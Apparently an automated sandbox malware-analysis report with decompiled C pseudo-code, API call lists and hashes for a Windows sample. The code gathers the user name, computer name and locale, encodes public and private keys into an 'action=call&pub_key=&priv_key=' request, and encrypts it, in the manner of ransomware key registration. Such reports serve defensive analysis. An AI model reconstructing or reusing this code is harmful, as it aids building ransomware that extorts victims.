                                      • Instruction Fuzzy Hash: 3D011A7260011CABCB209F94EE09DDA7B7CEF08351F008162FD05E6121D7329E20EBE4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 224 404af0-404af3 call 4048a0 226 404af8-404afa ExitProcess 224->226
                                      C-Code - Quality: 100%
                                      			_entry_() {
                                      				void* _t2;
                                      
                                      				E004048A0(_t2); // executed
                                      				ExitProcess(0);
                                      			}




                                      0x00404af3
                                      0x00404afa

                                      APIs
                                        • Part of subcall function 004048A0: Sleep.KERNELBASE(000003E8), ref: 004048AB
                                        • Part of subcall function 004048A0: ExitProcess.KERNEL32 ref: 004048BC
                                      • ExitProcess.KERNEL32 ref: 00404AFA
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$Sleep
                                      • String ID:
                                      • API String ID: 1320946285-0
                                      • Opcode ID: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
                                      • Instruction ID: 1b19d15e4aeeb9909d6bd86e0db19be6c339a400cc2da824b43fea8bc324f338
                                      • Opcode Fuzzy Hash: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
                                      • Instruction Fuzzy Hash: 56A011302082080AE0803BA2A80AB0A320C0B00A02F800030A208A80C208A8280080AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 230 405750-4057dc call 4039b0 call 406d90 call 406ba0 VirtualAlloc 237 4057f1-4057f5 230->237 238 4057de-4057e0 230->238 240 4057f7-405806 237->240 238->237 239 4057e2-4057ef 238->239 239->240 241 405808-40580d 240->241 242 40581f-405821 240->242 241->242 243 40580f-40581d 241->243 244 405825-40582e 242->244 243->244 245 405830-40583b 244->245 246 40583d-40583f 244->246 245->246 247 405843-405845 245->247 246->247 248 405c14 247->248 249 40584b-4058c8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 247->249 252 405c1a 248->252 250 4058ca-4058cc 249->250 251 4058df 249->251 250->251 253 4058ce-4058dd 250->253 254 4058e7-4058f0 lstrlenA 251->254 255 405c1f-405c3d VirtualFree call 407720 252->255 253->254 256 4058f2-4058f8 254->256 257 4058fa 254->257 256->257 259 405902-40590c lstrlenA 256->259 257->259 261 405942-405949 lstrlenA 259->261 262 40590e-40591a 259->262 264 405971-405a38 lstrcatW lstrlenW call 4069a0 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 261->264 265 40594b-40594f 261->265 263 405920-405925 262->263 266 405932-40593c lstrlenA 263->266 267 405927-405929 263->267 276 405a44-405a46 264->276 277 405a3a-405a3c 264->277 268 405953-405958 265->268 266->263 271 40593e 266->271 267->266 270 40592b-40592e 267->270 272 405965-40596f lstrlenA 268->272 273 40595a-40595c 268->273 270->266 271->261 272->264 272->268 273->272 275 40595e-405961 273->275 275->272 278 405a4a-405afe lstrlenW call 408b30 lstrlenA call 405c40 call 405cf0 CryptBinaryToStringA 276->278 277->276 279 405a3e-405a42 277->279 286 405b00 GetLastError 278->286 287 405b06-405b2c lstrlenA VirtualAlloc lstrlenA 278->287 279->278 286->287 288 405b36 287->288 289 405b2e-405b34 287->289 290 405b3e-405b45 lstrlenA 288->290 289->288 289->290 291 405b47-405b4f 290->291 292 405b6e-405ba4 lstrlenA MultiByteToWideChar call 405370 290->292 294 405b50-405b55 291->294 299 405ba6-405bd5 VirtualFree * 3 292->299 300 405bd7-405bdd 292->300 296 405b62-405b6c lstrlenA 294->296 297 405b57-405b59 294->297 296->292 296->294 297->296 298 405b5b-405b5e 297->298 298->296 299->255 301 405be4-405c12 VirtualFree * 3 300->301 302 405bdf-405be2 300->302 301->252 302->301
                                      C-Code - Quality: 78%
                                      			E00405750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                      				char _v295;
                                      				char _v296;
                                      				char _v404;
                                      				char _v408;
                                      				void* _v428;
                                      				CHAR* _v432;
                                      				int _v436;
                                      				int _v440;
                                      				char _v442;
                                      				CHAR* _v444;
                                      				short _v448;
                                      				int _v452;
                                      				char _v456;
                                      				CHAR* _v464;
                                      				int _v468;
                                      				void* _v472;
                                      				BYTE* _v476;
                                      				WCHAR* _v480;
                                      				WCHAR* _v484;
                                      				void* _v488;
                                      				void* _v492;
                                      				short* _v496;
                                      				CHAR* _v500;
                                      				void* _v504;
                                      				long _v508;
                                      				CHAR* _v512;
                                      				CHAR* _v528;
                                      				CHAR* _t133;
                                      				void* _t135;
                                      				int _t145;
                                      				void* _t148;
                                      				int _t149;
                                      				void* _t150;
                                      				void* _t152;
                                      				signed int _t159;
                                      				signed int _t163;
                                      				void* _t170;
                                      				signed int _t172;
                                      				CHAR* _t185;
                                      				long _t189;
                                      				intOrPtr _t199;
                                      				int _t200;
                                      				void _t202;
                                      				int _t203;
                                      				void _t204;
                                      				int _t205;
                                      				int _t210;
                                      				long _t213;
                                      				void* _t219;
                                      				short _t228;
                                      				char* _t229;
                                      				WCHAR* _t231;
                                      				short _t233;
                                      				CHAR* _t234;
                                      				char _t235;
                                      				void* _t238;
                                      				long _t240;
                                      				long _t241;
                                      				void* _t243;
                                      				void* _t245;
                                      				short _t248;
                                      				int _t249;
                                      				void* _t255;
                                      				CHAR* _t256;
                                      				WCHAR* _t258;
                                      				WCHAR* _t259;
                                      				signed int _t261;
                                      				CHAR* _t262;
                                      				CHAR* _t263;
                                      				int _t267;
                                      				void* _t268;
                                      				long _t271;
                                      				void* _t272;
                                      				void* _t273;
                                      				long _t279;
                                      				int _t280;
                                      				long _t281;
                                      				void* _t282;
                                      				CHAR* _t283;
                                      				short _t284;
                                      
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_v456 = __ecx;
                                      				_t210 = __edx;
                                      				_v436 = __edx;
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				_push(1);
                                      				_push(__ecx);
                                      				_push(1);
                                      				E004039B0( &_v404);
                                      				E00406D90( &_v492);
                                      				_t255 = E00406BA0( &_v492);
                                      				_t7 = _a8 + _t210 + 8; // 0x8
                                      				_t213 = _t255 + _t7 * 8 << 3;
                                      				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
                                      				_t248 = 0;
                                      				_v512 = _t133;
                                      				_v528 = _t133;
                                      				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
                                      				if(_t133 == 0 || _t228 >= _t213) {
                                      					_v448 = _t248;
                                      					_t256 = _t133;
                                      				} else {
                                      					_t256 =  &(_t133[_t228]);
                                      					_v448 = _t133;
                                      					_v444 = _t256;
                                      					_t248 = _t228;
                                      				}
                                      				_t135 = 2 + _a8 * 8;
                                      				if(_v428 == 0) {
                                      					L7:
                                      					_t229 = 0;
                                      					_v432 = 0;
                                      				} else {
                                      					_t284 = _t248 + _t135;
                                      					if(_t284 >= _t213) {
                                      						goto L7;
                                      					} else {
                                      						_t229 = _t256;
                                      						_v432 = _t256;
                                      						_t256 =  &(_t256[_t135]);
                                      						_t248 = _t284;
                                      						_v444 = _t256;
                                      					}
                                      				}
                                      				_t267 = _v440;
                                      				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
                                      					_t256 = 0;
                                      					_v444 = 0;
                                      				}
                                      				if(_t229 == 0) {
                                      					goto L53;
                                      				} else {
                                      					_t249 = _a8;
                                      					_v436 = _t249 + _t249;
                                      					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
                                      					_v452 = _t267 + _t267;
                                      					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
                                      					_t145 = lstrlenA(_t256);
                                      					_t271 = _t145 + lstrlenA(_v464) + 0x42;
                                      					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
                                      					_v472 = _t148;
                                      					_v488 = _t148;
                                      					_v492 = 0;
                                      					_t149 = lstrlenA(_v464);
                                      					_t231 = _v472;
                                      					_t150 = _t149 + 1;
                                      					if(_t231 == 0 || _t150 >= _t271) {
                                      						_v484 = 0;
                                      					} else {
                                      						_v492 = _t150;
                                      						_v488 = _t231 + _t150;
                                      						_v484 = _t231;
                                      					}
                                      					_t152 = lstrlenA(_t256) + 1;
                                      					if(_v472 == 0 || _t152 + _v492 >= _t271) {
                                      						_v488 = 0;
                                      					}
                                      					_t272 = 0;
                                      					if(lstrlenA(_v464) != 0) {
                                      						_t245 = _v484;
                                      						_t263 = _v464;
                                      						_v492 = _t245;
                                      						do {
                                      							_t204 =  *((intOrPtr*)(_t272 + _t263));
                                      							if(_t204 != 0xa && _t204 != 0xd) {
                                      								 *_t245 = _t204;
                                      								_v492 = _t245 + 1;
                                      							}
                                      							_t272 = _t272 + 1;
                                      							_t205 = lstrlenA(_t263);
                                      							_t245 = _v492;
                                      						} while (_t272 < _t205);
                                      						_t256 = _v476;
                                      					}
                                      					_t273 = 0;
                                      					if(lstrlenA(_t256) != 0) {
                                      						_t243 = _v488;
                                      						_v492 = _t243;
                                      						do {
                                      							_t202 =  *((intOrPtr*)(_t273 + _t256));
                                      							if(_t202 != 0xa && _t202 != 0xd) {
                                      								 *_t243 = _t202;
                                      								_v492 = _t243 + 1;
                                      							}
                                      							_t273 = _t273 + 1;
                                      							_t203 = lstrlenA(_t256);
                                      							_t243 = _v492;
                                      						} while (_t273 < _t203);
                                      					}
                                      					_t258 = _v480;
                                      					lstrcatW(_t258, L"action=call&");
                                      					_t259 =  &(_t258[lstrlenW(_t258)]);
                                      					E004069A0( &_v440, _t259);
                                      					lstrcatW(_t259, L"&pub_key=");
                                      					_t159 = lstrlenW(_t259);
                                      					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
                                      					lstrcatW(_t259, L"&priv_key=");
                                      					_t163 = lstrlenW(_t259);
                                      					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
                                      					lstrcatW(_t259, L"&version=2.1");
                                      					_t279 = (lstrlenW(_v484) << 4) + 0x12;
                                      					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
                                      					_v480 = _t219;
                                      					_t170 = 2 + lstrlenW(_v484) * 8;
                                      					if(_t219 == 0 || _t170 >= _t279) {
                                      						_v492 = 0;
                                      					} else {
                                      						_v492 = _t219;
                                      					}
                                      					_t172 = lstrlenW(_v480);
                                      					_t233 = "#shasj"; // 0x61687323
                                      					_t261 = _t172;
                                      					asm("movq xmm0, [0x410128]");
                                      					_v448 = _t233;
                                      					_t234 =  *0x410134; // 0x6a73
                                      					_v444 = _t234;
                                      					_t235 =  *0x410136; // 0x0
                                      					asm("movq [esp+0x3c], xmm0");
                                      					_v442 = _t235;
                                      					_v296 = 0;
                                      					E00408B30( &_v295, 0, 0xff);
                                      					E00405C40( &_v296,  &_v456, lstrlenA( &_v456));
                                      					_t280 = _t261 + _t261;
                                      					E00405CF0( &_v296, _v480, _t280);
                                      					_t262 = _v492;
                                      					_v468 = _t261 * 8;
                                      					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
                                      						GetLastError();
                                      					}
                                      					_t105 = lstrlenA(_t262) + 2; // 0x2
                                      					_t281 = _t105;
                                      					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
                                      					_t107 = lstrlenA(_t262) + 1; // 0x1
                                      					_t238 = _t107;
                                      					_t185 = _v504;
                                      					if(_t185 == 0) {
                                      						L40:
                                      						_v500 = 0;
                                      					} else {
                                      						_v500 = _t185;
                                      						if(_t238 >= _t281) {
                                      							goto L40;
                                      						}
                                      					}
                                      					_t282 = 0;
                                      					if(lstrlenA(_t262) != 0) {
                                      						_t241 = _v500;
                                      						_v508 = _t241;
                                      						do {
                                      							_t199 =  *((intOrPtr*)(_t282 + _t262));
                                      							if(_t199 != 0xa && _t199 != 0xd) {
                                      								 *_t241 = _t199;
                                      								_v508 = _t241 + 1;
                                      							}
                                      							_t282 = _t282 + 1;
                                      							_t200 = lstrlenA(_t262);
                                      							_t241 = _v508;
                                      						} while (_t282 < _t200);
                                      					}
                                      					_t283 = _v500;
                                      					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
                                      					_v508 = 0;
                                      					_t189 = E00405370(_t283,  &_v508, 1);
                                      					if(_t189 != 0) {
                                      						_t240 = _v508;
                                      						if(_t240 != 0) {
                                      							 *_a12 = _t240;
                                      						}
                                      						VirtualFree(_v504, 0, 0x8000);
                                      						VirtualFree(_v492, 0, 0x8000);
                                      						VirtualFree(_v488, 0, 0x8000);
                                      						L53:
                                      						_t268 = 1;
                                      					} else {
                                      						VirtualFree(_v504, _t189, 0x8000);
                                      						VirtualFree(_v492, 0, 0x8000);
                                      						VirtualFree(_v488, 0, 0x8000);
                                      						_t268 = 0;
                                      					}
                                      				}
                                      				VirtualFree(_v428, 0, 0x8000);
                                      				E00407720( &_v408);
                                      				return _t268;
                                      			}



















































































                                      0x0040575f
                                      0x00405760
                                      0x00405762
                                      0x00405763
                                      0x00405768
                                      0x0040576c
                                      0x0040576e
                                      0x00405772
                                      0x00405774
                                      0x00405775
                                      0x00405777
                                      0x00405778
                                      0x0040577a
                                      0x0040577b
                                      0x0040577d
                                      0x0040577e
                                      0x00405783
                                      0x00405785
                                      0x00405786
                                      0x0040578f
                                      0x00405798
                                      0x004057a9
                                      0x004057b4
                                      0x004057ba
                                      0x004057c0
                                      0x004057c6
                                      0x004057c8
                                      0x004057cc
                                      0x004057d3
                                      0x004057dc
                                      0x004057f1
                                      0x004057f5
                                      0x004057e2
                                      0x004057e2
                                      0x004057e5
                                      0x004057e9
                                      0x004057ed
                                      0x004057ed
                                      0x004057ff
                                      0x00405806
                                      0x0040581f
                                      0x0040581f
                                      0x00405821
                                      0x00405808
                                      0x00405808
                                      0x0040580d
                                      0x00000000
                                      0x0040580f
                                      0x0040580f
                                      0x00405811
                                      0x00405815
                                      0x00405817
                                      0x00405819
                                      0x00405819
                                      0x0040580d
                                      0x0040582a
                                      0x0040582e
                                      0x0040583d
                                      0x0040583f
                                      0x0040583f
                                      0x00405845
                                      0x00000000
                                      0x0040584b
                                      0x0040584b
                                      0x00405857
                                      0x0040586a
                                      0x0040586f
                                      0x00405883
                                      0x0040588c
                                      0x004058a0
                                      0x004058a5
                                      0x004058af
                                      0x004058b3
                                      0x004058b7
                                      0x004058bf
                                      0x004058c1
                                      0x004058c5
                                      0x004058c8
                                      0x004058df
                                      0x004058ce
                                      0x004058d1
                                      0x004058d5
                                      0x004058d9
                                      0x004058d9
                                      0x004058ea
                                      0x004058f0
                                      0x004058fa
                                      0x004058fa
                                      0x00405906
                                      0x0040590c
                                      0x0040590e
                                      0x00405912
                                      0x00405916
                                      0x00405920
                                      0x00405920
                                      0x00405925
                                      0x0040592b
                                      0x0040592e
                                      0x0040592e
                                      0x00405933
                                      0x00405934
                                      0x00405936
                                      0x0040593a
                                      0x0040593e
                                      0x0040593e
                                      0x00405943
                                      0x00405949
                                      0x0040594b
                                      0x0040594f
                                      0x00405953
                                      0x00405953
                                      0x00405958
                                      0x0040595e
                                      0x00405961
                                      0x00405961
                                      0x00405966
                                      0x00405967
                                      0x00405969
                                      0x0040596d
                                      0x00405953
                                      0x00405971
                                      0x00405981
                                      0x00405990
                                      0x00405994
                                      0x0040599f
                                      0x004059a2
                                      0x004059c0
                                      0x004059cc
                                      0x004059cf
                                      0x004059f1
                                      0x004059fd
                                      0x00405a17
                                      0x00405a27
                                      0x00405a29
                                      0x00405a2f
                                      0x00405a38
                                      0x00405a46
                                      0x00405a3e
                                      0x00405a3e
                                      0x00405a3e
                                      0x00405a4e
                                      0x00405a50
                                      0x00405a56
                                      0x00405a58
                                      0x00405a67
                                      0x00405a6b
                                      0x00405a77
                                      0x00405a7c
                                      0x00405a85
                                      0x00405a8b
                                      0x00405a8f
                                      0x00405a97
                                      0x00405ab8
                                      0x00405ac1
                                      0x00405acf
                                      0x00405ade
                                      0x00405ae2
                                      0x00405afe
                                      0x00405b00
                                      0x00405b00
                                      0x00405b10
                                      0x00405b10
                                      0x00405b1d
                                      0x00405b23
                                      0x00405b23
                                      0x00405b26
                                      0x00405b2c
                                      0x00405b36
                                      0x00405b36
                                      0x00405b2e
                                      0x00405b2e
                                      0x00405b34
                                      0x00000000
                                      0x00000000
                                      0x00405b34
                                      0x00405b3f
                                      0x00405b45
                                      0x00405b47
                                      0x00405b4b
                                      0x00405b50
                                      0x00405b50
                                      0x00405b55
                                      0x00405b5b
                                      0x00405b5e
                                      0x00405b5e
                                      0x00405b63
                                      0x00405b64
                                      0x00405b66
                                      0x00405b6a
                                      0x00405b50
                                      0x00405b6e
                                      0x00405b84
                                      0x00405b90
                                      0x00405b9a
                                      0x00405ba4
                                      0x00405bd7
                                      0x00405bdd
                                      0x00405be2
                                      0x00405be2
                                      0x00405bf6
                                      0x00405c03
                                      0x00405c10
                                      0x00405c1a
                                      0x00405c1a
                                      0x00405ba6
                                      0x00405bb7
                                      0x00405bc4
                                      0x00405bd1
                                      0x00405bd3
                                      0x00405bd3
                                      0x00405ba4
                                      0x00405c2a
                                      0x00405c30
                                      0x00405c3d

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 004057C0
                                      • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0040586A
                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00405883
                                      • lstrlenA.KERNEL32(00000000), ref: 0040588C
                                      • lstrlenA.KERNEL32(?), ref: 00405894
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004058A5
                                      • lstrlenA.KERNEL32(?), ref: 004058BF
                                      • lstrlenA.KERNEL32(00000000), ref: 004058E8
                                      • lstrlenA.KERNEL32(?), ref: 00405908
                                      • lstrlenA.KERNEL32(?), ref: 00405934
                                      • lstrlenA.KERNEL32(00000000), ref: 00405945
                                      • lstrlenA.KERNEL32(00000000), ref: 00405967
                                      • lstrcatW.KERNEL32(?,action=call&), ref: 00405981
                                      • lstrlenW.KERNEL32(?), ref: 0040598A
                                      • lstrcatW.KERNEL32(?,&pub_key=), ref: 0040599F
                                      • lstrlenW.KERNEL32(?), ref: 004059A2
                                      • lstrlenA.KERNEL32(00000000), ref: 004059AB
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 004059C0
                                      • lstrcatW.KERNEL32(?,&priv_key=), ref: 004059CC
                                      • lstrlenW.KERNEL32(?), ref: 004059CF
                                      • lstrlenA.KERNEL32(00000000), ref: 004059DC
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 004059F1
                                      • lstrcatW.KERNEL32(?,&version=2.1), ref: 004059FD
                                      • lstrlenW.KERNEL32(?), ref: 00405A09
                                      • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00405A1D
                                      • lstrlenW.KERNEL32(?), ref: 00405A2D
                                      • lstrlenW.KERNEL32(?), ref: 00405A4E
                                      • _memset.LIBCMT ref: 00405A97
                                      • lstrlenA.KERNEL32(?), ref: 00405AAA
                                        • Part of subcall function 00405C40: _memset.LIBCMT ref: 00405C6D
                                      • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00405AF6
                                      • GetLastError.KERNEL32 ref: 00405B00
                                      • lstrlenA.KERNEL32(?), ref: 00405B07
                                      • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405B16
                                      • lstrlenA.KERNEL32(?), ref: 00405B21
                                      • lstrlenA.KERNEL32(?), ref: 00405B41
                                      • lstrlenA.KERNEL32(?), ref: 00405B64
                                      • lstrlenA.KERNEL32(00000000), ref: 00405B73
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00405B84
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BB7
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BC4
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BD1
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BF6
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C03
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C10
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C2A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                      • String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
                                      • API String ID: 2781787645-879081296
                                      • Opcode ID: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
                                      • Instruction ID: 3a474d479e6cb3117948b119d777232bcba310bd2a7d749a27062e74eb6ba077
                                      • Opcode Fuzzy Hash: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
                                      • Instruction Fuzzy Hash: CEE18C71608301AFE710DF25CC85B6BBBE5EB88754F00492EF585A72A0D774AD05CFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00405050(CHAR* __ecx, CHAR** __edx) {
                                      				int _v8;
                                      				CHAR* _v12;
                                      				int _v16;
                                      				char _v18;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				char _v32;
                                      				void* _v36;
                                      				CHAR** _v40;
                                      				void* _v44;
                                      				char _v299;
                                      				char _v300;
                                      				void* _v356;
                                      				void* _v360;
                                      				int _t55;
                                      				int _t56;
                                      				BYTE* _t57;
                                      				int _t59;
                                      				void* _t63;
                                      				void* _t64;
                                      				char _t65;
                                      				void* _t77;
                                      				signed int _t79;
                                      				signed int _t81;
                                      				int _t82;
                                      				int _t85;
                                      				char _t87;
                                      				CHAR* _t95;
                                      				int _t97;
                                      				char* _t98;
                                      				void* _t107;
                                      				void* _t108;
                                      				signed char _t109;
                                      				short* _t111;
                                      				WCHAR* _t116;
                                      				CHAR* _t117;
                                      				BYTE* _t124;
                                      				WCHAR* _t125;
                                      				WCHAR* _t126;
                                      				void* _t127;
                                      				long _t128;
                                      				char* _t129;
                                      				int _t130;
                                      				void* _t131;
                                      				CHAR* _t132;
                                      				void* _t133;
                                      				long _t134;
                                      				char* _t135;
                                      
                                      				_v40 = __edx;
                                      				_v12 = __ecx;
                                      				_t55 = lstrlenA(__ecx);
                                      				_t107 = VirtualAlloc;
                                      				_t56 = _t55 + 1;
                                      				_v16 = _t56;
                                      				_t4 = _t56 + 1; // 0x2
                                      				_t128 = _t4;
                                      				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
                                      				_v44 = _t57;
                                      				if(_t57 == 0 || _v16 >= _t128) {
                                      					_t124 = 0;
                                      					__eflags = 0;
                                      				} else {
                                      					_t124 = _t57;
                                      				}
                                      				_t129 = 0;
                                      				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
                                      				_t144 = _t59;
                                      				if(_t59 == 0) {
                                      					GetLastError();
                                      					goto L26;
                                      				} else {
                                      					_t63 = "#shasj"; // 0x61687323
                                      					asm("movq xmm0, [0x410128]");
                                      					_t130 = _v16;
                                      					_v24 = _t63;
                                      					_t64 =  *0x410134; // 0x6a73
                                      					_v20 = _t64;
                                      					_t65 =  *0x410136; // 0x0
                                      					_v18 = _t65;
                                      					asm("movq [ebp-0x1c], xmm0");
                                      					_v300 = 0;
                                      					E00408B30( &_v299, 0, 0xff);
                                      					E00405C40( &_v300,  &_v32, lstrlenA( &_v32));
                                      					E00405CF0( &_v300, _t124, _t130);
                                      					_t116 =  &_v32;
                                      					asm("xorps xmm0, xmm0");
                                      					asm("movdqu [ebp-0x1c], xmm0");
                                      					E004033E0(_t116, _t144, _t124);
                                      					if(_v32 != 0) {
                                      						E00404FD0();
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						_push(_t107);
                                      						_push(_t130);
                                      						_push(_t124);
                                      						_t125 = _t116;
                                      						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                      						_v360 = _t131;
                                      						GetModuleFileNameW(0, _t131, 0x200);
